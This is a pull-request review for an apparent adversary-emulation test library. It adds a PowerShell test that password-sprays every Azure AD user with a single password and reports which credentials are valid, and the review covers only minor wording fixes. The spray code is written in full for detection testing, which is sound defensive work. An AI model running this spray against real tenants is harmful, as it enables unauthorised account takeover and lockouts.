### PR TITLE
T1110.003 azureadaccounts

### PR DESCRIPTION
**Pull request by piaconsigny**
**Details:**
Add azure ad accounts to password spraying test.

**Testing:**
test with Azure AD test environment.

T1110_003

### CODE REVIEW

File: atomics/T1110.003/T1110.003.yaml [hunk 1]
```diff
@@ -105,3 +105,59 @@ atomic_tests:
         }
       }
       Write-Host "End of password spraying"
+
+- name: Password spray all azure AD users with a single password. 
+  auto_generated_guid: a8aa2d3e-1c52-4016-bc73-0f8854cfa80a
+  description: |
+    Attempt to brute force all domain user with a single password (called "password spraying") on Azure AD via AzureAD powershell module.
+    Valid credentials are needed to fetch the list of Azure AD users.
```
Comment (cnotin) [inline atomics/T1110.003/T1110.003.yaml:113]:
```suggestion
    Valid credentials are only needed to fetch the list of Azure AD users.
```

File: atomics/T1110.003/T1110.003.yaml [hunk 2]
```diff
@@ -105,3 +105,59 @@ atomic_tests:
...
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{valid_password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{valid_username}", $Pword
+      Connect-AzureAD -Credential $Credential > $null
+
+      ($DomainUsers = Get-AzureADUser -All $true) > $null
```
Comment (cnotin) [inline atomics/T1110.003/T1110.003.yaml:146]:
```suggestion
      ($Users = Get-AzureADUser -All $true) > $null
```
They aren't "domain" users ;)

File: atomics/T1110.003/T1110.003.yaml [hunk 3]
```diff
@@ -105,3 +105,59 @@ atomic_tests:
...
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+
+      $DomainUsers | Foreach-Object {
+        $user = $_.UserPrincipalName
+        $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "$user", $Pword
+        try {
+          Write-Host " [-] Attempting #{password} on account ${user}."
+          Connect-AzureAD -Credential $Credential 2>&1> $null
+          # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
+          Write-Host " [!] ${user}:#{password} are valid credentials!  `r`n"
```
Comment (cnotin) [inline atomics/T1110.003/T1110.003.yaml:157]:
```suggestion
          Write-Host " [!] ${user}:#{password} are valid credentials!`r`n"
```

File: atomics/T1110.003/T1110.003.yaml [hunk 4]
```diff
@@ -105,3 +105,59 @@ atomic_tests:
...
+          Disconnect-AzureAD > $null
+        } catch {
+          Write-Host " [-] ${user}:#{password} invalid credentials `r`n"
```
Comment (cnotin) [inline atomics/T1110.003/T1110.003.yaml:160]:
```suggestion
          Write-Host " [-] ${user}:#{password} invalid credentials`r`n"
```

File: atomics/T1110.003/T1110.003.yaml (hunk 2 above)
Comment (piaconsigny) [reply atomics/T1110.003/T1110.003.yaml:146]: It is also called a domain, but i see how it can be misleading. Will fix it

**Review by cnotin — APPROVED** [review]
Yeah!

**Pull request merged**